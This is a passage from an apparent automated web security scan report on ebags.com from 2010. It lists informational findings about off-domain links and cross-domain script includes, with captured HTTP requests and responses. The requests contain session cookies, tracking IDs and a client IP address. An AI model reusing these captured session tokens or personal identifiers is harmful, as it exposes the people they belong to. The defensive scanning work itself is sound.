<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
...[SNIP]...

4.19. http://www.ebags.com/shoppingcart/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; mbox=session#1293371743230-938821#1293373808|PC#1293371743230-938821.20#1294581548|check#true#1293372008; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1180; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":4,"to":4.8,"c":"http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1293371947239}; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:38 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 53903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/handbags/department/index.cfm?sub_site_id=14"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_01.jpg" alt="Handbags" border="0"></a>
...[SNIP]...
<a href="/luggage/department/index.cfm?sub_site_id=16"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_02.jpg" alt="Luggage" border="0"></a>
...[SNIP]...
<a href="/business_cases/department/index.cfm?sub_site_id=25"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_03.jpg" alt="Business & Laptops" border="0"></a>
...[SNIP]...
<a href="/backpacks/department/index.cfm?sub_site_id=10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_04.jpg" alt="Backpacks" border="0"></a>
...[SNIP]...
<a href="/urban_gear/department/index.cfm?sub_site_id=21"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_05.jpg" alt="Messengers" border="0"></a>
...[SNIP]...
<a href="/travel_accessories/department/index.cfm?sub_site_id=24"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_06.jpg" alt="Travel Accessories" border="0"></a>
...[SNIP]...
<a href="/product/ebags/value-set-mother-lode-jr-weekender/106967?productid=1281965&rlid=search_no&rcode=res10122605249151377589046" title="eBags Value Set: Mother Lode Jr. + Weekender Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/106967_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Value Set: Mother Lode Jr. + Weekender Luggage"></a>
...[SNIP]...
<a href="/product/ebags/value-set-mother-lode-junior-mini/106986?productid=1282031&rlid=search_no&rcode=res10122605249151377589046" title="eBags Value Set: Mother Lode + Junior + Mini Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/106986_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Value Set: Mother Lode + Junior + Mini Luggage"></a>
...[SNIP]...
<a href="/product/hartmann-luggage/tweed-cosmetic-tote/127926?productid=1331914&rlid=search_no&rcode=res10122605249151377589046" title="Hartmann Luggage Tweed&trade; Cosmetic Tote Travel Accessories">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/127926_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="Hartmann Luggage Tweed&trade; Cosmetic Tote Travel Accessories"></a>
...[SNIP]...
<a href="/product/ebags/mother-lode-tls-weekender-convertible/143101?productid=1370034&rlid=search_no&rcode=res10122605249151377589046" title="eBags Mother Lode TLS Weekender Convertible Backpacks">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/143101_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Weekender Convertible Backpacks"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
...[SNIP]...

4.20. http://www.ebags.com/shoppingcart/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a59%3a59+AM&requesttimeout=9000&itemAdded=true HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460
Cache-Control: max-age=0
Origin: http://www.ebags.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1150; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373842|PC#1293371743230-938821.20#1294581582|check#true#1293372042; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; __cmbDomTm=0; fsr.a=1293371984270; s_sq=ebagsprod%3D%2526pid%253DProduct%252520Details%252520%25253A%252520107617%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fa1512.g.akamaitech.net%25252Ff%25252F1512%25252F124%25252F1h%25252Fimages.ebags.com%25252Fimg%25252FProductDetail%25252Fadd-to-cart.gif%2526ot%253DIMAGE
Content-Length: 79

cartAction=additem&RequireCookie=YES&modelID=107617&ProductID=1283460&x=64&y=15

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 14:00:06 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:00:06 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 64326


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a id="linkShop" href="javascript:continueShoppingLinks(); return false" onclick="continueShoppingLinks(); return false" onmouseover="continueShoppingLinks(); return false" style="position: relative"><img style="float: left;" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_continueshopping.gif" border="0"></a>
...[SNIP]...
<td align="right">
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_topleftcorner.gif"></td>
<td width="920" bgcolor="#e9e9e9"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/s.gif"></td>
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_toprightcorner.gif"></td>
...[SNIP]...
<a href="/products/index.cfm?ModelID=107617&Basketalready=yes&productID=1283460&ItemID=1&CartLink=View"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width=60 height=60 border=0 alt="baggallini - A La Carte Bagg - Medium - Crinkle Nylon" hspace="0" border="0" vspace="5"></a>
...[SNIP]...
<a href="javascript:chgFormFuseaction('SubmitCart');setVar();document.Form1.submit();"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_proceed.gif" alt="Proceed to Checkout" title="Click Here to Proceed to Checkout"> </a>
...[SNIP]...
<a href="/shoppingcart/index.cfm?fuseaction=PayPalExpressSend" >
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart/bnr_MSPFbanner_ec2_143x32.gif" border="0" title="Shipping method will default to standard ground but can be changed on the final cart page." >
</a>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_bottomleftcorner.gif"></td>
<td width="920" bgcolor="#e9e9e9"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/s.gif"></td>
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_bottomrightcorner.gif"></td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 51 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.ebags.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:34 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:34 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.2. http://www.ebags.com/blocks/ajax/helppop-up.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/ajax/helppop-up.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blocks/ajax/helppop-up.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 3761


<div id="help-container">
<div class="contact-container">
<script language="JavaScript">
var akamaipath = 'http://a1512.g.akamaitech.net/f/1512/124/1h/www.ebags.com';
</script>
<script src="http://a1512.g.akamaitech.net/f/1512/124/1h/www.ebags.com/LivePerson/View/mtagconfig.js" type="text/Javascript"></script>
...[SNIP]...

5.3. http://www.ebags.com/brand/bosca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/bosca

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/bosca HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:12:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.4. http://www.ebags.com/brand/burton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/burton

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/burton HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
